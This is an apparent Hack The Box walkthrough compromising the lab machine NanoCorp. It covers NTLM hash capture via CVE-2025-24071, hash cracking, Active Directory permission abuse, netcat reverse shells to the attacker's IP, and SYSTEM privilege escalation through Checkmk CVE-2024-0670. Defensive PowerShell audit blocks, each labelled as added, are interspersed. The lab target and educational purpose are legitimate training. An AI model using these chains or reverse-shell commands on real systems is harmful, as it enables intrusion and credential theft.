Hack The Box / WINDOWS / 2026-06-20

Hack The Box — NanoCorp (Windows)

A Windows File Explorer vulnerability (CVE-2025-24071) lets us capture and crack the credentials of a user. That user can change the password of another user who has shell access on the machine. Finally, we exploit a vulnerability in Checkmk (CVE-2024-0670) to get a reverse shell as nt authority/system.

Target:

  • IP: 10.10.11.93

Port scan

sudo nmap -sC -sV 10.10.11.93 -p- -v
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
80/tcp    open  http              Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://nanocorp.htb/
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-11-12 03:46:36Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server     Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.nanocorp.htb
| Issuer: commonName=DC01.nanocorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-20T01:58:09
| Not valid after:  2026-04-21T01:58:09
| MD5:   4f00:467e:e490:4141:7c94:19b7:4ab3:76e6
|_SHA-1: 0b96:8038:2148:abee:9372:2809:14f1:b62a:a539:320b
|_ssl-date: 2025-11-12T03:48:07+00:00; +9h14m39s from scanner time.
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Issuer: commonName=dc01.nanocorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-06T22:58:43
| Not valid after:  2026-04-06T23:18:43
| MD5:   2e3e:1a10:10b8:7f43:dc93:a4d9:05ef:6053
|_SHA-1: 4674:6312:27ce:e783:91b7:ec00:1746:f114:d669:4ea0
|_http-server-header: Microsoft-HTTPAPI/2.0
6556/tcp  open  check_mk          check_mk extension for Nagios 2.1.0p10
9389/tcp  open  mc-nmf            .NET Message Framing
49664/tcp open  msrpc             Microsoft Windows RPC
49667/tcp open  msrpc             Microsoft Windows RPC
49671/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
54100/tcp open  msrpc             Microsoft Windows RPC
54119/tcp open  msrpc             Microsoft Windows RPC
58937/tcp open  msrpc             Microsoft Windows RPC
Service Info: Hosts: nanocorp.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Add dc01.nanocorp.htb and nanocorp.htb to /etc/hosts.

Initial enumeration

With a browser, go to http://nanocorp.htb/. It is a PHP website served by Apache on Windows. The About Us page links to hire.nanocorp.htb. Add hire.nanocorp.htb to /etc/hosts and go to http://hire.nanocorp.htb/, which is also a PHP website.

The site has a file upload. The page says that only .zip files are allowed, but if we upload an invalid .zip file the error reads: Invalid file type. Only ZIP, 7Z, and RAR files are allowed. So 7z and RAR archives are accepted as well.

File Explorer vulnerability - CVE-2025-24071

Windows File Explorer is affected by CVE-2025-24071: when a user opens an archive containing a crafted file, Explorer initiates an SMB connection to a host chosen by the attacker and authenticates to it with the user's NTLMv2 credentials. Since whatever we upload is presumably opened on the server side, this is worth trying.

A PoC is available at https://github.com/0x6rss/CVE-2025-24071_PoC. Let's replicate it.

First, run responder to listen for the incoming authentication:

sudo responder -I tun0

Then, run the PoC:

git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
cd CVE-2025-24071_PoC
python3 poc.py
Enter your file name: test
Enter IP (EX: 192.168.1.162): 10.10.16.119
completed

A file exploit.zip is created. Upload it to the website and wait. On the terminal running responder, we get:

[SMB] NTLMv2-SSP Client   : 10.10.11.93
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash     : web_svc::NANOCORP:9af330c92ab237aa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
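The capture above works because the server-side user's Explorer session authenticated outbound to our SMB listener. As a defensive check (added here, not part of the writeup), the following PowerShell reports whether outgoing NTLM to remote servers is restricted and whether an outbound block rule for TCP 445 exists; the registry value is the documented LSA setting, and the remediation line is an assumption to adapt.

```powershell
# Added example, not from the writeup: report the outgoing-NTLM policy and any
# enabled outbound firewall rule that blocks SMB (TCP 445) to remote hosts.
$lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$value  = 'RestrictSendingNTLMTraffic'   # 0 = allow all, 1 = audit all, 2 = deny all

function Get-OutgoingNtlmPolicy {
    $current = (Get-ItemProperty -Path $lsaKey -Name $value -ErrorAction SilentlyContinue).$value
    if ($null -eq $current) { $current = 0 }   # absent value behaves as "allow all"
    $state = switch ([int]$current) { 0 { 'Allow all' } 1 { 'Audit all' } 2 { 'Deny all' } default { 'Unknown' } }
    [pscustomobject]@{
        Setting = 'Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers'
        Value   = [int]$current
        State   = $state
    }
}

function Get-OutboundSmbBlockRules {
    # Any enabled outbound block rule covering TCP 445 (or all remote ports) counts.
    Get-NetFirewallRule -Direction Outbound -Action Block -Enabled True -ErrorAction SilentlyContinue |
        Where-Object {
            $pf = $_ | Get-NetFirewallPortFilter
            ($pf.Protocol -eq 'TCP' -or $pf.Protocol -eq 'Any') -and
            ((@($pf.RemotePort) -contains '445') -or (@($pf.RemotePort) -contains 'Any'))
        } | Select-Object DisplayName, Profile
}

Get-OutgoingNtlmPolicy | Format-List
$rules = Get-OutboundSmbBlockRules
if (-not $rules) {
    Write-Warning 'No enabled outbound block rule for TCP 445: NTLM can be sent to any remote SMB host.'
} else {
    $rules | Format-Table -AutoSize
}

# Remediation (assumption: run as an administrator after testing; "Deny all" can break
# NTLM-only integrations, so start with 1 = Audit and review the NTLM Operational log
# under Applications and Services Logs\Microsoft\Windows\NTLM before moving to 2):
# Set-ItemProperty -Path $lsaKey -Name $value -Value 1
```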

Cracking the password of the user web_svc

Save the hash to a file named hash and crack it with hashcat:

hashcat -a 0 ./hash /usr/share/wordlists/rockyou.txt

We get:

WEB_SVC::NANOCORP:9af330c92ab237aa:3faaac9edec73414e3e3214bfd8e7801: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:dksehdgh712!@#

We now have credentials: web_svc / dksehdgh712!@#

Let's use them for SMB enumeration:

nxc smb dc01.nanocorp.htb -u web_svc -p 'dksehdgh712!@#' --shares
SMB         10.10.11.93     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.93     445    DC01             [+] nanocorp.htb\web_svc:dksehdgh712!@#
SMB         10.10.11.93     445    DC01             [*] Enumerated shares
SMB         10.10.11.93     445    DC01             Share           Permissions     Remark
SMB         10.10.11.93     445    DC01             -----           -----------     ------
SMB         10.10.11.93     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.93     445    DC01             C$                              Default share
SMB         10.10.11.93     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.93     445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.93     445    DC01             SYSVOL          READ            Logon server share

BloodHound enumeration

We can enumerate the domain with BloodHound:

bloodhound-ce-python -u web_svc -p 'dksehdgh712!@#' -ns 10.10.11.93 -d 'nanocorp.htb' -dc dc01.nanocorp.htb -c All --zip

We get a .zip file.

Run BloodHound. On Kali Linux:

sudo bloodhound

Upload the .zip to BloodHound.

From BloodHound we see that web_svc has an AddSelf relationship on the it_support group, so we can add our user to this group.

Download bloodyAD: https://github.com/CravateRouge/bloodyAD

python3 bloodyAD/bloodyAD.py --host dc01.nanocorp.htb -d nanocorp.htb --dc-ip 10.10.11.93 -u 'web_svc' -p 'dksehdgh712!@#' add groupMember it_support web_svc
[+] web_svc added to it_support

Changing the password of the user monitoring_svc

From BloodHound we see that the it_support group has a ForceChangePassword relationship on the monitoring_svc user, so we can change that user's password.

python3 bloodyAD/bloodyAD.py --host dc01.nanocorp.htb -d nanocorp.htb --dc-ip 10.10.11.93 -u 'web_svc' -p 'dksehdgh712!@#' set password monitoring_svc 'Summer2025!'
[+] Password changed successfully!
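The two edges abused above (AddSelf on it_support, ForceChangePassword on monitoring_svc) are ACEs on the AD objects themselves. As a defensive audit (added here, not part of the writeup), the following PowerShell lists such ACEs granted to non-privileged principals on a given user or group; it assumes the ActiveDirectory module (RSAT) and read access to the objects, and the object names and privileged-principal pattern are assumptions to adapt.

```powershell
# Added example, not from the writeup: find ACEs on a user or group that give a
# non-privileged principal AddSelf (Self on the member attribute) or
# ForceChangePassword (User-Force-Change-Password extended right).
Import-Module ActiveDirectory
$forceChangePwd = [guid]'00299570-246d-11d0-a768-00aa006e0529'  # User-Force-Change-Password right
$memberAttr     = [guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'  # member attribute
$privileged     = '^(NT AUTHORITY\\SYSTEM|BUILTIN\\Administrators|[^\\]+\\(Domain|Enterprise) Admins)$'
$selfBit        = [int][System.DirectoryServices.ActiveDirectoryRights]::Self
$extRightBit    = [int][System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight

function Get-AbusableAce {
    param([Parameter(Mandatory)][string]$Identity)   # sAMAccountName of a user or group
    $obj = Get-ADObject -Filter "sAMAccountName -eq '$Identity'" -Properties nTSecurityDescriptor
    if (-not $obj) { throw "Object '$Identity' not found" }
    foreach ($ace in $obj.nTSecurityDescriptor.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($who -match $privileged) { continue }
        $rights  = [int]$ace.ActiveDirectoryRights
        $anyType = ($ace.ObjectType -eq [guid]::Empty)   # empty GUID: applies to every attribute/right
        $edges = @()
        if ((($rights -band $selfBit) -ne 0) -and ($anyType -or ($ace.ObjectType -eq $memberAttr))) {
            $edges += 'AddSelf'
        }
        if ((($rights -band $extRightBit) -ne 0) -and ($anyType -or ($ace.ObjectType -eq $forceChangePwd))) {
            $edges += 'ForceChangePassword'
        }
        if ($edges.Count -gt 0) {
            [pscustomobject]@{
                Object    = $obj.Name
                Principal = $who
                Edges     = ($edges -join ',')
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Object names assumed from the writeup's BloodHound findings.
Get-AbusableAce -Identity 'it_support'
Get-AbusableAce -Identity 'monitoring_svc'
```

Entries whose Edges include AddSelf on a group, or ForceChangePassword on a service account, held by ordinary users or groups are the ones to remove or justify.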

Now, let's enumerate the SMB shares with the new user:

nxc smb dc01.nanocorp.htb -u monitoring_svc -p 'Summer2025!' --shares
SMB         10.10.11.93     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.93     445    DC01             [-] nanocorp.htb\monitoring_svc:Summer2025! STATUS_ACCOUNT_RESTRICTION

The error is explained here: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-apds/639c2244-b6d5-4ca3-8ca0-74fe787cbae6. Apparently it occurs when NTLM authentication is used, so let's switch to Kerberos. Grab a TGT for the user monitoring_svc:

getTGT.py nanocorp.htb/monitoring_svc:'Summer2025!' -dc-ip 10.10.11.93
[*] Saving ticket in monitoring_svc.ccache
export KRB5CCNAME=monitoring_svc.ccache
nxc smb dc01.nanocorp.htb -d nanocorp.htb -k --use-kcache --shares
SMB         dc01.nanocorp.htb 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB         dc01.nanocorp.htb 445    DC01             [+] nanocorp.htb\monitoring_svc from ccache
SMB         dc01.nanocorp.htb 445    DC01             [*] Enumerated shares
SMB         dc01.nanocorp.htb 445    DC01             Share           Permissions     Remark
SMB         dc01.nanocorp.htb 445    DC01             -----           -----------     ------
SMB         dc01.nanocorp.htb 445    DC01             ADMIN$                          Remote Admin
SMB         dc01.nanocorp.htb 445    DC01             C$                              Default share
SMB         dc01.nanocorp.htb 445    DC01             IPC$            READ            Remote IPC
SMB         dc01.nanocorp.htb 445    DC01             NETLOGON        READ            Logon server share
SMB         dc01.nanocorp.htb 445    DC01             SYSVOL          READ            Logon server share

Now it works. From BloodHound we see that the monitoring_svc user is a member of the Remote Management Users group, so we can use evil-winrm to get a shell on the machine.

First, edit /etc/krb5.conf and add these lines:

[realms]
        NANOCORP.HTB = {
                kdc = dc01.nanocorp.htb
                admin_server = dc01.nanocorp.htb
        }

[domain_realm]
        .nanocorp.htb = NANOCORP.HTB
        nanocorp.htb = NANOCORP.HTB

Then, run evil-winrm:

evil-winrm -i dc01.nanocorp.htb -u monitoring_svc -r nanocorp.htb -P 5986 -S

We get a PowerShell shell. However, it is not very stable, so let's get a more stable reverse shell.

Download nc64.exe (https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe) and upload it to the victim machine (for example, using a python http server and curl).

On the attacking machine, run a netcat listener:

rlwrap nc -vlnp 4444

On the victim machine, run:

C:\tmp\nc64.exe -e cmd.exe 10.10.16.119 4444

We get a reverse shell. Type powershell to get a powershell shell.

Checkmk - CVE-2024-0670

In C:\ProgramData we notice a checkmk folder: the Checkmk monitoring agent is installed.

ProgramData also contains a file cmk_agent_uninstall.txt, which contains:

Checkmk monitoring agent service - 2.1, 64-bit

This gives us the version, so we can search the internet for known vulnerabilities. We find one: CVE-2024-0670.

It is described here: https://checkmk.com/werk/16361.

A PoC is described here: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/.

We can create files in C:\Windows\Temp whose names follow a precise pattern (cmk_all_\d+_1.cmd), and the agent will run the commands in such a file as nt authority/system.

icacls C:\Windows\Temp
C:\Windows\Temp: Access is denied.
Successfully processed 0 files; Failed processing 1 files

Apparently the monitoring_svc user does not have permission to access C:\Windows\Temp. Let's try to get a reverse shell as web_svc instead.

Download RunasCs.exe (https://github.com/antonioCoco/RunasCs) and upload it to the victim machine. Then, on the victim machine, run:

.\RunasCs.exe web_svc 'dksehdgh712!@#' "whoami"
nanocorp\web_svc

We can run commands as web_svc. Let's get the reverse shell.

On the attacking machine, run a netcat listener:

rlwrap nc -vlnp 4444

On the victim machine, run:

.\RunasCs.exe web_svc 'dksehdgh712!@#' "C:\tmp\nc64.exe -e cmd.exe 10.10.16.119 4444"

We get a reverse shell as web_svc. Type powershell to get a powershell shell.

icacls C:\Windows\Temp
C:\Windows\Temp BUILTIN\Users:(CI)(S,WD,AD,X)
                BUILTIN\Administrators:(F)
                BUILTIN\Administrators:(OI)(CI)(IO)(F)
                NT AUTHORITY\SYSTEM:(F)
                NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                CREATOR OWNER:(OI)(CI)(IO)(F)
                NANOCORP\web_svc:(OI)(CI)(F)

Now we can write in C:\Windows\Temp.
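The icacls output above is the root cause the Checkmk advisory describes: a directory the agent trusts is writable by an unprivileged account. As a defensive audit (added here, not part of the writeup), the following PowerShell lists write-capable ACEs held by non-privileged principals on a set of directories; the path list and the trusted-principal list are assumptions to adapt.

```powershell
# Added example, not from the writeup: flag ACEs on directories the Checkmk
# agent reads from that let non-privileged principals create or change files.
param([string[]]$Paths = @('C:\Windows\Temp', 'C:\ProgramData\checkmk'))

$trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
             'CREATOR OWNER', 'NT SERVICE\TrustedInstaller')
# Rights that allow creating, appending to, replacing or deleting files.
$writeMask = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                   [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::DeleteSubdirectoriesAndFiles -bor
                   [System.Security.AccessControl.FileSystemRights]::WriteAttributes -bor
                   [System.Security.AccessControl.FileSystemRights]::Modify -bor
                   [System.Security.AccessControl.FileSystemRights]::FullControl)

function Get-RiskyAce {
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($trusted -contains $ace.IdentityReference.Value) { continue }
        # FileSystemRights may carry generic bits (negative values); -band on [int] handles them.
        if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Path
            Identity  = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

$findings = foreach ($p in $Paths) {
    if (Test-Path -LiteralPath $p) { Get-RiskyAce -Path $p }
    else { Write-Warning "Skipping missing path $p" }
}
if ($findings) { $findings | Format-Table -AutoSize }
else { Write-Host 'No write-capable ACEs for non-privileged principals.' }
```

On this box it would report both the default BUILTIN\Users create-file entry and the NANOCORP\web_svc:(OI)(CI)(F) entry seen above; the second is the one that is not a Windows default.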

We don't know the number in the file name used by the exploit, and it can change. To find the range of possible numbers, let's monitor the files cmk_all_*_1.cmd that the agent creates in C:\Windows\Temp.

See the attached script monitor.ps1. Upload it on the victim machine.

.\monitor.ps1
Monitoring C:\Windows\Temp for cmk_all_*_*.cmd

To trigger the creation of a cmk_all file, following the PoC, we can trigger a repair of the software (msiexec /fa).

We have to find the .msi file of Checkmk in the folder C:\Windows\Installer. There are several ways:

  1. Reading the installer keys in the registry:

Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties' | fl

We notice that checkmk has the following local package: C:\Windows\Installer\1e6f2.msi

  2. Checking the .msi files in the folder C:\Windows\Installer. See the attached script check_msi.ps1. Upload it to the victim machine and run it:

.\check_msi.ps1
MSIFile   ProductName
-------   -----------
1e6f2.msi Check MK Agent 2.1
387c2.msi Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532
387c6.msi Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532
387ca.msi Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532
387ce.msi Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532
387d1.msi VMware Tools

We notice that the .msi file of checkmk is 1e6f2.msi.

Now, on another shell as web_svc, following the PoC, we trigger the creation of the cmk_all file with the command:

msiexec /fa C:\Windows\Installer\1e6f2.msi /qn

On the terminal with monitor.ps1, we get:

[2025-12-31 16:36:25] Checkmk temp file created: C:\Windows\Temp\cmk_all_7580_1.cmd

We can reasonably assume that the correct range of numbers is between 1000 and 10000.

Instead of brute forcing the number, since we can monitor when a cmk_all file is created in C:\Windows\Temp, we can overwrite its content with the commands we want to run as soon as we detect it. The goal is a reverse shell as nt authority/system.

Copy nc64.exe to C:\Windows\Temp. Then, on the attacking machine, run a netcat listener:

rlwrap nc -vlnp 4444

See the attached script monitor_and_replace.ps1. Upload it to the victim machine and run it:

.\monitor_and_replace.ps1

On the other shell as web_svc, trigger the creation of the cmk_all file with the command:

msiexec /fa C:\Windows\Installer\1e6f2.msi /qn

On the terminal with monitor_and_replace.ps1, we get:

[2026-01-01 15:43:05] Checkmk temp file created: C:\Windows\Temp\cmk_all_2436_1.cmd
Replaced content with payload

On the terminal with the netcat listener, we get a reverse shell as nt authority/system. Type powershell to get a powershell shell.

whoami
nt authority\system

Useful Notes

Check the number of files in a folder:

$filesCount = (Get-ChildItem "C:\Windows\Temp" -File).Count; $filesCount

Check the 10 most recently accessed files in a folder:

Get-ChildItem C:\Windows\Temp | Sort-Object LastAccessTime -Descending | Select-Object -First 10